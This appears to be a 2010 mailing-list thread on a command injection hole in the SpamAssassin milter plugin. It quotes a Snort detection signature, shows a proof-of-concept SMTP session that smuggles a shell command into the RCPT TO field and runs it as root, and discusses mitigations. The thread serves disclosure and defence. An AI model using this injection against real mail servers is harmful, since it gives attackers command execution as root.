On Mon, 2010-03-08 at 20:16 +0000, Ned Slider wrote: > Brian wrote: > > On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote: > >> just a heads up: I don't know if there is a problem with SA milter, but > >> there is a snort signature for it now. > >> > >> > >> -------- Original Message -------- > >> Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote > >> Arbitrary Command Injection Attempt > >> Date: Mon, 8 Mar 2010 13:03:52 +0000 > >> From: Kevin Ross <kevros...@googlemail.com> > >> To: emerging-s...@emergingthreats.net > >> <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com> > >> > >> > >> > >> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible > >> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; > >> flow:established,to_server; content:"to|3A|"; nocase; > >> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; > >> reference:url,www.securityfocus.com/bid/38578 > >> <http://www.securityfocus.com/bid/38578>; > >> reference:url,seclists.org/fulldisclosure/2010/Mar/140 > >> <http://seclists.org/fulldisclosure/2010/Mar/140>; sid:1324412; rev:1;) > >> > >> Kev > >> > > > > The key is this: > > > > "If spamass-milter is run with the expand flag (-x option) it runs a > > popen() including the attacker supplied > > recipient (RCPT TO)." > > > > POC IS > > > > $ nc localhost 25 > > 220 ownthabox ESMTP Postfix (Ubuntu) > > mail from: me () me com > > 250 2.1.0 Ok > > rcpt to: root+:"|touch /tmp/foo" > > 250 2.1.5 Ok > > > > $ ls -la /tmp/foo > > -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo > > > > > > Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses > > mail from: n...@example.com > 250 2.1.0 Ok > rcpt to: root+:"|touch /tmp/foo" > 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need > fully-qualified address > quit > 221 2.0.0 Bye > Connection closed by foreign host. > That's a Microsoft kind of answer if you don't mind me saying. Correct me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a bolt-on after thought for Postfix ;-)
It is easily mitigated by *not* running it with '-x' {Happy then **WITHOUT** Postfix}